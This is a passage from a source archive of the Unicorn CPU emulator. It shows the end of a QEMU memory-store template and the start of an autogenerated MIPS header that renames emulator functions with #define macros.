!memory_access_is_direct(mr, true)) { r = memory_region_dispatch_write(uc, mr, addr1, val, MO_64 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: stq_le_p(ptr, val); break; case DEVICE_BIG_ENDIAN: stq_be_p(ptr, val); break; default: stq_p(ptr, val); break; } invalidate_and_set_dirty(mr, addr1, 8); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); } void glue(address_space_stq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_NATIVE_ENDIAN); } void glue(address_space_stq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_LITTLE_ENDIAN); } void glue(address_space_stq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_BIG_ENDIAN); } #undef ARG1_DECL #undef ARG1 #undef SUFFIX #undef TRANSLATE #undef RCU_READ_LOCK #undef RCU_READ_UNLOCK �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/mips.h���������������������������������������������������������������������������0000664�0000000�0000000�00000370605�14675241067�0015307�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_mips_H #define UNICORN_AUTOGEN_mips_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mips #endif #define unicorn_fill_tlb unicorn_fill_tlb_mips #define reg_read reg_read_mips #define reg_write reg_write_mips #define uc_init uc_init_mips #define uc_add_inline_hook uc_add_inline_hook_mips #define uc_del_inline_hook uc_del_inline_hook_mips #define tb_invalidate_phys_range tb_invalidate_phys_range_mips #define use_idiv_instructions use_idiv_instructions_mips #define arm_arch arm_arch_mips #define tb_target_set_jmp_target tb_target_set_jmp_target_mips #define have_bmi1 have_bmi1_mips #define have_popcnt have_popcnt_mips #define have_avx1 have_avx1_mips #define have_avx2 have_avx2_mips #define have_isa have_isa_mips #define have_altivec have_altivec_mips #define have_vsx have_vsx_mips #define flush_icache_range flush_icache_range_mips #define s390_facilities s390_facilities_mips #define tcg_dump_op tcg_dump_op_mips #define tcg_dump_ops tcg_dump_ops_mips #define tcg_gen_and_i64 tcg_gen_and_i64_mips #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips #define tcg_gen_or_i64 tcg_gen_or_i64_mips #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips #define tcg_gen_st_i64 tcg_gen_st_i64_mips #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips #define cpu_icount_to_ns cpu_icount_to_ns_mips #define cpu_is_stopped cpu_is_stopped_mips #define cpu_get_ticks cpu_get_ticks_mips #define cpu_get_clock cpu_get_clock_mips #define cpu_resume cpu_resume_mips #define qemu_init_vcpu qemu_init_vcpu_mips #define cpu_stop_current cpu_stop_current_mips #define resume_all_vcpus resume_all_vcpus_mips #define vm_start vm_start_mips #define address_space_dispatch_compact address_space_dispatch_compact_mips #define flatview_translate flatview_translate_mips #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips #define qemu_get_cpu qemu_get_cpu_mips #define cpu_address_space_init cpu_address_space_init_mips #define cpu_get_address_space cpu_get_address_space_mips #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips #define cpu_exec_initfn cpu_exec_initfn_mips #define cpu_exec_realizefn cpu_exec_realizefn_mips #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips #define cpu_watchpoint_insert cpu_watchpoint_insert_mips #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips #define cpu_breakpoint_insert cpu_breakpoint_insert_mips #define cpu_breakpoint_remove cpu_breakpoint_remove_mips #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips #define cpu_abort cpu_abort_mips #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips #define flatview_add_to_dispatch flatview_add_to_dispatch_mips #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips #define qemu_ram_get_offset qemu_ram_get_offset_mips #define qemu_ram_get_used_length qemu_ram_get_used_length_mips #define qemu_ram_is_shared qemu_ram_is_shared_mips #define qemu_ram_pagesize qemu_ram_pagesize_mips #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips #define qemu_ram_alloc qemu_ram_alloc_mips #define qemu_ram_free qemu_ram_free_mips #define qemu_map_ram_ptr qemu_map_ram_ptr_mips #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mips #define qemu_ram_block_from_host qemu_ram_block_from_host_mips #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips #define cpu_check_watchpoint cpu_check_watchpoint_mips #define iotlb_to_section iotlb_to_section_mips #define address_space_dispatch_new address_space_dispatch_new_mips #define address_space_dispatch_free address_space_dispatch_free_mips #define flatview_read_continue flatview_read_continue_mips #define address_space_read_full address_space_read_full_mips #define address_space_write address_space_write_mips #define address_space_rw address_space_rw_mips #define cpu_physical_memory_rw cpu_physical_memory_rw_mips #define address_space_write_rom address_space_write_rom_mips #define cpu_flush_icache_range cpu_flush_icache_range_mips #define cpu_exec_init_all cpu_exec_init_all_mips #define address_space_access_valid address_space_access_valid_mips #define address_space_map address_space_map_mips #define address_space_unmap address_space_unmap_mips #define cpu_physical_memory_map cpu_physical_memory_map_mips #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips #define cpu_memory_rw_debug cpu_memory_rw_debug_mips #define qemu_target_page_size qemu_target_page_size_mips #define qemu_target_page_bits qemu_target_page_bits_mips #define qemu_target_page_bits_min qemu_target_page_bits_min_mips #define target_words_bigendian target_words_bigendian_mips #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips #define ram_block_discard_range ram_block_discard_range_mips #define ramblock_is_pmem ramblock_is_pmem_mips #define page_size_init page_size_init_mips #define set_preferred_target_page_bits set_preferred_target_page_bits_mips #define finalize_target_page_bits finalize_target_page_bits_mips #define cpu_outb cpu_outb_mips #define cpu_outw cpu_outw_mips #define cpu_outl cpu_outl_mips #define cpu_inb cpu_inb_mips #define cpu_inw cpu_inw_mips #define cpu_inl cpu_inl_mips #define memory_map memory_map_mips #define memory_map_io memory_map_io_mips #define memory_map_ptr memory_map_ptr_mips #define memory_cow memory_cow_mips #define memory_unmap memory_unmap_mips #define memory_moveout memory_moveout_mips #define memory_movein memory_movein_mips #define memory_free memory_free_mips #define flatview_unref flatview_unref_mips #define address_space_get_flatview address_space_get_flatview_mips #define memory_region_transaction_begin memory_region_transaction_begin_mips #define memory_region_transaction_commit memory_region_transaction_commit_mips #define memory_region_init memory_region_init_mips #define memory_region_access_valid memory_region_access_valid_mips #define memory_region_dispatch_read memory_region_dispatch_read_mips #define memory_region_dispatch_write memory_region_dispatch_write_mips #define memory_region_init_io memory_region_init_io_mips #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips #define memory_region_size memory_region_size_mips #define memory_region_set_readonly memory_region_set_readonly_mips #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips #define memory_region_from_host memory_region_from_host_mips #define memory_region_get_ram_addr memory_region_get_ram_addr_mips #define memory_region_add_subregion memory_region_add_subregion_mips #define memory_region_del_subregion memory_region_del_subregion_mips #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips #define memory_region_find memory_region_find_mips #define memory_region_filter_subregions memory_region_filter_subregions_mips #define memory_listener_register memory_listener_register_mips #define memory_listener_unregister memory_listener_unregister_mips #define address_space_remove_listeners address_space_remove_listeners_mips #define address_space_init address_space_init_mips #define address_space_destroy address_space_destroy_mips #define memory_region_init_ram memory_region_init_ram_mips #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips #define find_memory_mapping find_memory_mapping_mips #define exec_inline_op exec_inline_op_mips #define floatx80_default_nan floatx80_default_nan_mips #define float_raise float_raise_mips #define float16_is_quiet_nan float16_is_quiet_nan_mips #define float16_is_signaling_nan float16_is_signaling_nan_mips #define float32_is_quiet_nan float32_is_quiet_nan_mips #define float32_is_signaling_nan float32_is_signaling_nan_mips #define float64_is_quiet_nan float64_is_quiet_nan_mips #define float64_is_signaling_nan float64_is_signaling_nan_mips #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips #define floatx80_silence_nan floatx80_silence_nan_mips #define propagateFloatx80NaN propagateFloatx80NaN_mips #define float128_is_quiet_nan float128_is_quiet_nan_mips #define float128_is_signaling_nan float128_is_signaling_nan_mips #define float128_silence_nan float128_silence_nan_mips #define float16_add float16_add_mips #define float16_sub float16_sub_mips #define float32_add float32_add_mips #define float32_sub float32_sub_mips #define float64_add float64_add_mips #define float64_sub float64_sub_mips #define float16_mul float16_mul_mips #define float32_mul float32_mul_mips #define float64_mul float64_mul_mips #define float16_muladd float16_muladd_mips #define float32_muladd float32_muladd_mips #define float64_muladd float64_muladd_mips #define float16_div float16_div_mips #define float32_div float32_div_mips #define float64_div float64_div_mips #define float16_to_float32 float16_to_float32_mips #define float16_to_float64 float16_to_float64_mips #define float32_to_float16 float32_to_float16_mips #define float32_to_float64 float32_to_float64_mips #define float64_to_float16 float64_to_float16_mips #define float64_to_float32 float64_to_float32_mips #define float16_round_to_int float16_round_to_int_mips #define float32_round_to_int float32_round_to_int_mips #define float64_round_to_int float64_round_to_int_mips #define float16_to_int16_scalbn float16_to_int16_scalbn_mips #define float16_to_int32_scalbn float16_to_int32_scalbn_mips #define float16_to_int64_scalbn float16_to_int64_scalbn_mips #define float32_to_int16_scalbn float32_to_int16_scalbn_mips #define float32_to_int32_scalbn float32_to_int32_scalbn_mips #define float32_to_int64_scalbn float32_to_int64_scalbn_mips #define float64_to_int16_scalbn float64_to_int16_scalbn_mips #define float64_to_int32_scalbn float64_to_int32_scalbn_mips #define float64_to_int64_scalbn float64_to_int64_scalbn_mips #define float16_to_int16 float16_to_int16_mips #define float16_to_int32 float16_to_int32_mips #define float16_to_int64 float16_to_int64_mips #define float32_to_int16 float32_to_int16_mips #define float32_to_int32 float32_to_int32_mips #define float32_to_int64 float32_to_int64_mips #define float64_to_int16 float64_to_int16_mips #define float64_to_int32 float64_to_int32_mips #define float64_to_int64 float64_to_int64_mips #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips #define float16_to_uint16 float16_to_uint16_mips #define float16_to_uint32 float16_to_uint32_mips #define float16_to_uint64 float16_to_uint64_mips #define float32_to_uint16 float32_to_uint16_mips #define float32_to_uint32 float32_to_uint32_mips #define float32_to_uint64 float32_to_uint64_mips #define float64_to_uint16 float64_to_uint16_mips #define float64_to_uint32 float64_to_uint32_mips #define float64_to_uint64 float64_to_uint64_mips #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips #define int64_to_float16_scalbn int64_to_float16_scalbn_mips #define int32_to_float16_scalbn int32_to_float16_scalbn_mips #define int16_to_float16_scalbn int16_to_float16_scalbn_mips #define int64_to_float16 int64_to_float16_mips #define int32_to_float16 int32_to_float16_mips #define int16_to_float16 int16_to_float16_mips #define int64_to_float32_scalbn int64_to_float32_scalbn_mips #define int32_to_float32_scalbn int32_to_float32_scalbn_mips #define int16_to_float32_scalbn int16_to_float32_scalbn_mips #define int64_to_float32 int64_to_float32_mips #define int32_to_float32 int32_to_float32_mips #define int16_to_float32 int16_to_float32_mips #define int64_to_float64_scalbn int64_to_float64_scalbn_mips #define int32_to_float64_scalbn int32_to_float64_scalbn_mips #define int16_to_float64_scalbn int16_to_float64_scalbn_mips #define int64_to_float64 int64_to_float64_mips #define int32_to_float64 int32_to_float64_mips #define int16_to_float64 int16_to_float64_mips #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mips #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips #define uint64_to_float16 uint64_to_float16_mips #define uint32_to_float16 uint32_to_float16_mips #define uint16_to_float16 uint16_to_float16_mips #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips #define uint64_to_float32 uint64_to_float32_mips #define uint32_to_float32 uint32_to_float32_mips #define uint16_to_float32 uint16_to_float32_mips #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips #define uint64_to_float64 uint64_to_float64_mips #define uint32_to_float64 uint32_to_float64_mips #define uint16_to_float64 uint16_to_float64_mips #define float16_min float16_min_mips #define float16_minnum float16_minnum_mips #define float16_minnummag float16_minnummag_mips #define float16_max float16_max_mips #define float16_maxnum float16_maxnum_mips #define float16_maxnummag float16_maxnummag_mips #define float32_min float32_min_mips #define float32_minnum float32_minnum_mips #define float32_minnummag float32_minnummag_mips #define float32_max float32_max_mips #define float32_maxnum float32_maxnum_mips #define float32_maxnummag float32_maxnummag_mips #define float64_min float64_min_mips #define float64_minnum float64_minnum_mips #define float64_minnummag float64_minnummag_mips #define float64_max float64_max_mips #define float64_maxnum float64_maxnum_mips #define float64_maxnummag float64_maxnummag_mips #define float16_compare float16_compare_mips #define float16_compare_quiet float16_compare_quiet_mips #define float32_compare float32_compare_mips #define float32_compare_quiet float32_compare_quiet_mips #define float64_compare float64_compare_mips #define float64_compare_quiet float64_compare_quiet_mips #define float16_scalbn float16_scalbn_mips #define float32_scalbn float32_scalbn_mips #define float64_scalbn float64_scalbn_mips #define float16_sqrt float16_sqrt_mips #define float32_sqrt float32_sqrt_mips #define float64_sqrt float64_sqrt_mips #define float16_default_nan float16_default_nan_mips #define float32_default_nan float32_default_nan_mips #define float64_default_nan float64_default_nan_mips #define float128_default_nan float128_default_nan_mips #define float16_silence_nan float16_silence_nan_mips #define float32_silence_nan float32_silence_nan_mips #define float64_silence_nan float64_silence_nan_mips #define float16_squash_input_denormal float16_squash_input_denormal_mips #define float32_squash_input_denormal float32_squash_input_denormal_mips #define float64_squash_input_denormal float64_squash_input_denormal_mips #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips #define roundAndPackFloatx80 roundAndPackFloatx80_mips #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips #define int32_to_floatx80 int32_to_floatx80_mips #define int32_to_float128 int32_to_float128_mips #define int64_to_floatx80 int64_to_floatx80_mips #define int64_to_float128 int64_to_float128_mips #define uint64_to_float128 uint64_to_float128_mips #define float32_to_floatx80 float32_to_floatx80_mips #define float32_to_float128 float32_to_float128_mips #define float32_rem float32_rem_mips #define float32_exp2 float32_exp2_mips #define float32_log2 float32_log2_mips #define float32_eq float32_eq_mips #define float32_le float32_le_mips #define float32_lt float32_lt_mips #define float32_unordered float32_unordered_mips #define float32_eq_quiet float32_eq_quiet_mips #define float32_le_quiet float32_le_quiet_mips #define float32_lt_quiet float32_lt_quiet_mips #define float32_unordered_quiet float32_unordered_quiet_mips #define float64_to_floatx80 float64_to_floatx80_mips #define float64_to_float128 float64_to_float128_mips #define float64_rem float64_rem_mips #define float64_log2 float64_log2_mips #define float64_eq float64_eq_mips #define float64_le float64_le_mips #define float64_lt float64_lt_mips #define float64_unordered float64_unordered_mips #define float64_eq_quiet float64_eq_quiet_mips #define float64_le_quiet float64_le_quiet_mips #define float64_lt_quiet float64_lt_quiet_mips #define float64_unordered_quiet float64_unordered_quiet_mips #define floatx80_to_int32 floatx80_to_int32_mips #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips #define floatx80_to_int64 floatx80_to_int64_mips #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips #define floatx80_to_float32 floatx80_to_float32_mips #define floatx80_to_float64 floatx80_to_float64_mips #define floatx80_to_float128 floatx80_to_float128_mips #define floatx80_round floatx80_round_mips #define floatx80_round_to_int floatx80_round_to_int_mips #define floatx80_add floatx80_add_mips #define floatx80_sub floatx80_sub_mips #define floatx80_mul floatx80_mul_mips #define floatx80_div floatx80_div_mips #define floatx80_rem floatx80_rem_mips #define floatx80_sqrt floatx80_sqrt_mips #define floatx80_eq floatx80_eq_mips #define floatx80_le floatx80_le_mips #define floatx80_lt floatx80_lt_mips #define floatx80_unordered floatx80_unordered_mips #define floatx80_eq_quiet floatx80_eq_quiet_mips #define floatx80_le_quiet floatx80_le_quiet_mips #define floatx80_lt_quiet floatx80_lt_quiet_mips #define floatx80_unordered_quiet floatx80_unordered_quiet_mips #define float128_to_int32 float128_to_int32_mips #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips #define float128_to_int64 float128_to_int64_mips #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips #define float128_to_uint64 float128_to_uint64_mips #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips #define float128_to_uint32 float128_to_uint32_mips #define float128_to_float32 float128_to_float32_mips #define float128_to_float64 float128_to_float64_mips #define float128_to_floatx80 float128_to_floatx80_mips #define float128_round_to_int float128_round_to_int_mips #define float128_add float128_add_mips #define float128_sub float128_sub_mips #define float128_mul float128_mul_mips #define float128_div float128_div_mips #define float128_rem float128_rem_mips #define float128_sqrt float128_sqrt_mips #define float128_eq float128_eq_mips #define float128_le float128_le_mips #define float128_lt float128_lt_mips #define float128_unordered float128_unordered_mips #define float128_eq_quiet float128_eq_quiet_mips #define float128_le_quiet float128_le_quiet_mips #define float128_lt_quiet float128_lt_quiet_mips #define float128_unordered_quiet float128_unordered_quiet_mips #define floatx80_compare floatx80_compare_mips #define floatx80_compare_quiet floatx80_compare_quiet_mips #define float128_compare float128_compare_mips #define float128_compare_quiet float128_compare_quiet_mips #define floatx80_scalbn floatx80_scalbn_mips #define float128_scalbn float128_scalbn_mips #define softfloat_init softfloat_init_mips #define tcg_optimize tcg_optimize_mips #define gen_new_label gen_new_label_mips #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips #define tcg_expand_vec_op tcg_expand_vec_op_mips #define tcg_register_jit tcg_register_jit_mips #define tcg_tb_insert tcg_tb_insert_mips #define tcg_tb_remove tcg_tb_remove_mips #define tcg_tb_lookup tcg_tb_lookup_mips #define tcg_tb_foreach tcg_tb_foreach_mips #define tcg_nb_tbs tcg_nb_tbs_mips #define tcg_region_reset_all tcg_region_reset_all_mips #define tcg_region_init tcg_region_init_mips #define tcg_code_size tcg_code_size_mips #define tcg_code_capacity tcg_code_capacity_mips #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips #define tcg_malloc_internal tcg_malloc_internal_mips #define tcg_pool_reset tcg_pool_reset_mips #define tcg_context_init tcg_context_init_mips #define tcg_tb_alloc tcg_tb_alloc_mips #define tcg_prologue_init tcg_prologue_init_mips #define tcg_func_start tcg_func_start_mips #define tcg_set_frame tcg_set_frame_mips #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips #define tcg_temp_new_internal tcg_temp_new_internal_mips #define tcg_temp_new_vec tcg_temp_new_vec_mips #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips #define tcg_temp_free_internal tcg_temp_free_internal_mips #define tcg_const_i32 tcg_const_i32_mips #define tcg_const_i64 tcg_const_i64_mips #define tcg_const_local_i32 tcg_const_local_i32_mips #define tcg_const_local_i64 tcg_const_local_i64_mips #define tcg_op_supported tcg_op_supported_mips #define tcg_gen_callN tcg_gen_callN_mips #define tcg_op_remove tcg_op_remove_mips #define tcg_emit_op tcg_emit_op_mips #define tcg_op_insert_before tcg_op_insert_before_mips #define tcg_op_insert_after tcg_op_insert_after_mips #define tcg_cpu_exec_time tcg_cpu_exec_time_mips #define tcg_gen_code tcg_gen_code_mips #define tcg_gen_op1 tcg_gen_op1_mips #define tcg_gen_op2 tcg_gen_op2_mips #define tcg_gen_op3 tcg_gen_op3_mips #define tcg_gen_op4 tcg_gen_op4_mips #define tcg_gen_op5 tcg_gen_op5_mips #define tcg_gen_op6 tcg_gen_op6_mips #define tcg_gen_mb tcg_gen_mb_mips #define tcg_gen_addi_i32 tcg_gen_addi_i32_mips #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips #define tcg_gen_div_i32 tcg_gen_div_i32_mips #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mips #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips #define tcg_gen_abs_i32 tcg_gen_abs_i32_mips #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips #define tcg_gen_subi_i64 tcg_gen_subi_i64_mips #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mips #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips #define tcg_gen_div_i64 tcg_gen_div_i64_mips #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips #define tcg_gen_not_i64 tcg_gen_not_i64_mips #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mips #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips #define 